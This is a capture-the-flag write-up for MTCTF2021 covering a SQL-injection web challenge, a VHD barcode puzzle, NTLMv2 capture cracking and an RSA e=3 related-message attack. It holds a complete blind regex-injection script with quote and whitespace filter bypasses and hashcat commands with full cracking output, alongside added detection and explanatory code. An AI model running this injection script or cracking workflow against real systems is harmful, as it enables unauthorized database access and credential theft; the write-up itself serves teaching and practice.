MTCTF2021 Partial Write-up

2021-05-27


MTCTF

Web

sql


Quotes are blacklisted. Fill username with a backtick, then do a regex-based blind injection; note that the regex special characters $ . * ? ^ have to be skipped:


import requests
import time


def str2int(mystr):
    # Pack the bytes of the string into one integer so it can be sent as a 0x... literal (no quotes needed)
    i = 0
    myint = 0
    while (i < len(mystr)):
        myint += ord(mystr[i]) * pow(pow(2, 8), len(mystr) - i - 1)
        i += 1
    return myint


sess = requests.Session()
url = ''  # target URL (omitted in the original post)
f = '账号或密码错误'  # text the page contains on failure
y = 'flag is not here'  # text the page contains on success
start = 0  # starting character position of the string
strlen = 80  # length of the string to brute-force
sleep_time = 0
ostr = '^'  # regex anchored at the start; grows by one character per confirmed match
# str2find = '(database())' # CTF
# str2find = 'password' # This_1s_thE_Passw0rd
str2find = 'username'
# str2find = '(select flag from flag)' # string or statement to look up; may need extra parentheses
# str2find = '(select `2` from (select 1,2 union select * from user)a limit 1,1)'
for j in range(start, start + strlen):
    for i in range(32, 127):  # printable character range
        # for i in range(95, 127):  # printable character range
        if i == 46 or i == 42 or i == 43 or i == 63 or i == 94:  # skip some regex special characters ($ . * ? ^ etc.)
            continue
        time.sleep(sleep_time)
        # regexp binary 0x5e61;
        temp_str = ostr + chr(i)
        ent = '{} regexp binary {}'.format(
            str2find, hex(str2int(temp_str)))  # the condition to test
        payload = "||{}#".format(ent)  # injected statement
        # print(payload)
        # exit()
        # build the POST data
        data = {
            'username': '`',  # the backtick described above
            'password': payload.replace(' ', '/**/')  # spaces replaced by inline comments
        }
        sess.get(url)
        res = sess.post(url, data=data)
        res.encoding = res.apparent_encoding  # handle the Chinese page encoding
        text = res.text
        if f in text:
            continue
        elif y in text:
            ostr += chr(i)
            print(ostr, j)
            break
        else:  # neither positive nor negative: unexpected response
            print('error:', text)
            break
print(ostr)


After dumping password through the injection, log in and get the flag.
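A defender-side counterpart to the script above, added here and not part of the original write-up: a small detector that undoes the /**/ whitespace substitution and decodes the 0x... literal of a `regexp binary` probe, so the prefix being tested becomes readable in logs. The sample request bodies are constructed, not captured traffic.

```python
import re
from urllib.parse import parse_qs

# Matches the probe shape the script above sends: <expr> regexp binary 0x<hex>
PROBE_RE = re.compile(r"regexp\s+binary\s+0x([0-9a-fA-F]+)", re.IGNORECASE)

# Constructed sample POST bodies: two probes as the script would send them
# (username is a backtick, spaces replaced by /**/), and one ordinary login.
SAMPLE_BODIES = [
    "username=%60&password=%7C%7Cusername/**/regexp/**/binary/**/0x5e54%23",
    "username=%60&password=%7C%7C(select/**/flag/**/from/**/flag)/**/regexp/**/binary/**/0x5e666c61%23",
    "username=alice&password=correct-horse-battery",
]


def normalize_sql(fragment: str) -> str:
    """Replace inline comments with spaces, undoing the '/**/' whitespace substitution."""
    return re.sub(r"/\*.*?\*/", " ", fragment, flags=re.DOTALL)


def decode_hex_literal(hex_digits: str) -> str:
    """Turn the 0x... literal back into the text that str2int() packed."""
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits
    return bytes.fromhex(hex_digits).decode("latin-1")


def extract_regexp_probes(body: str):
    """Return (field, decoded regex) for each form field carrying a REGEXP BINARY 0x... probe."""
    probes = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for match in PROBE_RE.finditer(normalize_sql(value)):
                probes.append((field, decode_hex_literal(match.group(1))))
    return probes


def scan_bodies(bodies):
    """Map each body index to its probes; bodies without probes are left out."""
    return {idx: found for idx, body in enumerate(bodies) if (found := extract_regexp_probes(body))}


if __name__ == "__main__":
    for idx, probes in scan_bodies(SAMPLE_BODIES).items():
        print(idx, probes)
```

Seeing the same field hit with prefixes that grow by one character per request (^T, ^Th, ^Thi, ...) is the signature of this character-by-character extraction.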



Misc

Misc1
We get a vhd file; 360 Compression (360压缩) extracts it directly.



We get a pile of contents that look like pieces of a barcode; joining them one by one in the default order



gives a meaningless jumble.
Guessing that the order might follow the sectors, drop the vhd into WinHex,



sort by sector and re-assemble manually to get the image.



Scanning the code gives the text EuO9&cDH; open flag.exe, this is its key.
Enter it directly and get flag.txt


Misc3

NTLMv2 request flow
1. The client sends a request to the server containing the login user name in plaintext. The server has already stored the login user name and the corresponding password hash.
2. On receiving the request, the server generates a 16-digit random number (called the Challenge) and sends it back to the client in plaintext. It encrypts the Challenge with the stored password hash of that user, obtaining Challenge1.
3. On receiving the Challenge, the client encrypts it with the login user's password hash, obtaining Challenge2 (this result is called the response), and sends the response to the server.
4. The server receives the client's encrypted response and compares Challenge1 with it; if they match, authentication succeeds.
The NTLMv2 format is:
username::domain:challenge:HMAC-MD5:blob
username: nanming
domain: MicrosoftAccount


challenge is the NTLM Server Challenge; domain is obtained from the packet contents (IP address or machine name)
Challenge:6a99833ddd690e7a


HMAC-MD5 corresponds to NTProofStr in the packet



NTProofStr:
980a5dc38aaff466c367eff70bcf80cb
response:   010100000000000042325524355ed601421c***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



From the capture file name we know the password is eight characters, the first four being pass, so generate the matching candidates:
crunch 8 8 -t pass%%%% >> 1.txt
Try cracking it


└─#  hashcat -m 5600  nanming::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421c***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  /root/1.txt -o found.txt --force
-m selects the hash type (5600); --force forces execution
hashcat (v6.1.1) starting...
 
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Common KVM processor, 5844/5908 MB (2048 MB allocatable), 4MCU
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
 
Host memory required for this attack: 65 MB
 
Dictionary cache hit:
* Filename..: /root/1.txt
* Passwords.: 10001
* Bytes.....: 90008
* Keyspace..: 10001
 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc3...000000
Time.Started.....: Sun May 23 18:29:23 2021, (0 secs)
Time.Estimated...: Sun May 23 18:29:23 2021, (0 secs)
Guess.Base.......: File (/root/1.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    42913 H/s (5.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4096/10001 (40.96%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/10001 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: pass0000 -> pass4094
 
Started: Sun May 23 18:29:20 2021
Stopped: Sun May 23 18:29:25 2021
 
┌──(root💀kali)-[~]
└─# cat found.txt
NANMING::MicrosoftAccount:6a99833ddd690e7a:980a5dc38aaff466c367eff70bcf80cb:010100000000000042325524355ed601421c***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:pass1952
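The four steps of the flow above, written out as an added example (not code from the write-up): the client's NTProofStr, the server's check, and the `user::domain:challenge:NTProofStr:blob` line that hashcat mode 5600 consumes. User name, domain and server challenge are the page's; the NT hash (MD4 of the UTF-16LE password) is assumed to be given and is a constructed placeholder, as is the blob apart from its first bytes.

```python
import hashlib
import hmac

# Values from the write-up's capture.
USER = "nanming"
DOMAIN = "MicrosoftAccount"
SERVER_CHALLENGE = bytes.fromhex("6a99833ddd690e7a")

# Constructed placeholders: a fake NT hash and a minimal NTLMv2 blob
# (version header, timestamp, client challenge, empty target info).
NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")
BLOB = (bytes.fromhex("01010000") + bytes(4)          # response version and reserved
        + bytes.fromhex("42325524355ed601")           # timestamp (first eight bytes of the page's response)
        + bytes.fromhex("0011223344556677")           # client challenge (constructed)
        + bytes(4) + bytes(4))                        # reserved, end-of-list AV pair


def ntlmv2_key(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 hash: HMAC-MD5 keyed with the NT hash over UTF-16LE(UPPER(user) + domain)."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof_str(nt_hash: bytes, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """Step 3: the client's response (NTProofStr) is HMAC-MD5(NTLMv2 hash, challenge || blob)."""
    return hmac.new(ntlmv2_key(nt_hash, user, domain), challenge + blob, hashlib.md5).digest()


def server_check(nt_hash, user, domain, challenge, blob, received_proof: bytes) -> bool:
    """Step 4: recompute with the stored hash and compare in constant time."""
    expected = nt_proof_str(nt_hash, user, domain, challenge, blob)
    return hmac.compare_digest(expected, received_proof)


def hashcat_line(user, domain, challenge: bytes, proof: bytes, blob: bytes) -> str:
    """Mode 5600 input: user::domain:challenge:NTProofStr:blob, all hex."""
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    proof = nt_proof_str(NT_HASH, USER, DOMAIN, SERVER_CHALLENGE, BLOB)
    print(hashcat_line(USER, DOMAIN, SERVER_CHALLENGE, proof, BLOB))
    print("server accepts:", server_check(NT_HASH, USER, DOMAIN, SERVER_CHALLENGE, BLOB, proof))
```

Because everything except the NT hash travels in the clear, a captured exchange can be checked offline against candidate passwords; the user name is upper-cased before keying, which is why hashcat reports NANMING.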


Crypto

easy_RSA



Given n, e = 3, encrypt(m+1) and encrypt(m); solving the two equations below simultaneously gives m.

 

 

EXP: python
import gmpy2
from libnum import *
n=int("0x9371c61a2b760109781f229d43c6f05***de65aa2a674ff92334cb5219132448d72c1293c145eb6f35e58791669f2d8d3b6ce506f4b3543beb947cf119f463a00bd33a33c4d566c4fd3f4c73c697fa5f3bf65976284b9cc96ec817241385d480003cdda9649fa0995b013e66f583c9a9710f7e18396fbf461cb31720f94a0f79",16)
e=3
c1=int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffbbd5a5e1a10f686c3f240e85d011f6c8b968d1d607b2e1d5a78ad6947b7d3ec8f33ad32489befab601fe745164e4ff4aed7630da89af7f902f6a1bf7266c9c95b29f2c69c33b93a709f282d43b10c61b1a1fe76f5fee970780d7512389fd1",16)
c2=int("0x5f4e03f28702208b215f39f1c8598b77074bfa238dfb9ce424af7cc8a61f7ea48ffc5c26b0c12bcff9f697f274f59f0e55a147768332fc1f1bac5bbc8f9b***8104f232bdd20091d26adc52e36feda4a156eae7dce4650f83fabc828fdcfb01d25efb98db8b94811ca855a6aa77caff991e7b986db844ff7a140218449aaa7e8",16)
# (m+1)^3 - m^3 = 3m^2 + 3m + 1, so m is a root of 3m^2 + 3m + (1 - (c2 - c1)) = 0
a = 3
b = 3
c = c1 - c2 + 1
det, exact = gmpy2.iroot(b**2 - 4*a*c, 2)  # integer square root of the discriminant
# result of the computation above
det = 419924980211305067664086451929469473556246023638897570322178499116255792376077397263806409834463657927723353414807
solu = (det - b)//(2*a)
print(n2s(solu))
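The relation the script above hardcodes, carried through in general as an added example (not the write-up's code): it takes the difference modulo n, checks that the square root is exact, and builds its own e = 3 instance from two probable primes (constructed; the recovery itself needs only the public modulus and the two ciphertexts).

```python
import math
import random

def is_probable_prime(n: int, rounds: int = 20) -> bool:
    """Miller-Rabin, enough to build a demo modulus."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def random_prime(bits: int) -> int:
    """Random probable prime with the top bit set."""
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand

def recover_from_consecutive(n: int, c_m: int, c_m1: int):
    """Recover m from c_m = m^3 mod n and c_m1 = (m+1)^3 mod n.
    (m+1)^3 - m^3 = 3m^2 + 3m + 1; while that is below n the modular difference d is exact
    and m = (sqrt(12d - 3) - 3) / 6, the positive root of 3m^2 + 3m + (1 - d) = 0.
    Returns None when the root is not exact (m too large, or not consecutive plaintexts)."""
    d = (c_m1 - c_m) % n
    disc = 12 * d - 3
    root = math.isqrt(disc) if disc >= 0 else -1
    if root * root != disc or (root - 3) % 6:
        return None
    return (root - 3) // 6

def demo_instance(message: bytes, bits: int = 1024):
    """Constructed e = 3 instance: n from two probable primes, m = message as an integer."""
    n = random_prime(bits // 2) * random_prime(bits // 2)
    m = int.from_bytes(message, "big")
    return n, pow(m, 3, n), pow(m + 1, 3, n), m
```

`demo_instance(b"...")` followed by `recover_from_consecutive(n, c1, c2)` returns m; the write-up's hardcoded det is the `root` value here (6m + 3), and the trick only works while 3m^2 + 3m + 1 stays below n.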

 

This gives the archive password:
the key is :
everything_is_easy_in_this_question

The file extracted from the archive: break its ciphertext with an XOR key-reuse attack.




We get flag{it_1s_P@dd1n_@nd_p@d}

Author: Timeline Sec

This article was published by a SecPulse (安全脉搏) column author; please credit it when reposting: https://www.secpulse.com/archives/159654.html
